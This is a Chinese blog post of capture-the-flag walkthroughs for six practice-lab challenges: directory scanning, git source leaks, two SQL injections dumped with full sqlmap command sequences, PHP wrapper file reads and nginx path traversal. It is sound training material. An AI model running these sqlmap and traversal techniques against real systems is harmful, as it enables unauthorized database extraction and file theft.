《从0到1:CTFer成长之路》题目wp

发布于 2021-11-23  317 次阅读


第一题:常见的信息搜集

进入靶场环境:

题目内容说明flag一共分为3部分,用dirsearch进行目录扫描

扫描完成,发现有三个可疑文件。

依次访问,首先访问robots.txt

根据robots协议里的路径路径访问文件,得到一部分flag

访问index.php~,得到第二部分flag

访问.index.php.swp,得到第三部分flag

将三部分flag拼接到一起获得完整flag:n1book{info_1s_v3ry_imp0rtant_hack}

第二题:粗心的小李

进入靶场环境:

根据页面文字提示,猜测本题考点是git泄露

手工测试是否存在Git泄露

存在Git泄露,利用GitHack脚本下载源码

发现一个index.html文件

发现flag:n1book{git_looks_s0_easyfun}

第三题:SQL注入-1

进入靶场环境:

根据题目名称猜测题目考点为:SQL注入,访问靶场环境发现参数id=1

由于sql盲注较为繁琐,这里直接使用sqlmap跑结果

sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id --dbs

发现四个数据库,查看note数据库内容。

构造新的sqlmap参数,查看数据库note内的所有表名

sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id -D "note" --tables

发现疑似放有flag数据的表,查看表内列名

sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id -D "note" -T "fl4g" --columns

查看表内数据

sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id -D "note" -T "fl4g" -C "fllllag" --dump

发现flag:n1book{union_select_is_so_cool}

第四题:SQL注入-2

进入靶场环境

访问login.php

发现一个登录框,输入任意数据,通过bp抓包

将POST请求包保存到本地命名为2222.txt,用sqlmap脚本进行sql注入

sqlmap -r 2222.txt --batch -p name --dbs

发现名为note的数据库,查看此数据库下的所有表名

sqlmap -r 2222.txt --batch -p name -D "note" --tables

查看fl4g表内的列名

sqlmap -r 2222.txt --batch -p name -D "note" -T "fl4g" --columns

查看表内数据

sqlmap -r 2222.txt --batch -p name -D "note" -T "fl4g" -C "flag" --dump

发现flag:n1book{login_sqli_is_nice}

第五题:afr_1

进入靶场环境:

发现参数p=hello,页面输出了hello world!猜测本题考点是文件读取,并且自动添加后缀

通过php伪协议直接读取flag文件

对base64加密数据进行解密

发现flag:n1book{afr_1_solved}

第六题:afr_2

进入靶场环境

查看源码发现img目录

访问img目录

并没有发现flag文件

发现使用nginx/1.14.0中间件,猜想可能有目录穿越

发现flag文件,直接访问

下载后,发现flag,flag:n1book{afr_2_solved}


我从未觉得繁琐,说浪漫些,我很爱你。